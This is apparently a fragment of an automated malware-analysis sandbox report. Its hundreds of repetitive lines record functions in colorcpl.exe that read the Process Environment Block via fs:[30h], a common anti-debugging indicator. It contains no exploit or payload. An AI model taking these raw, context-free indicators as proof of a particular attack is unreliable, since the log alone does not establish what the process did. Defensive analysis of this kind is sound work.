          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]
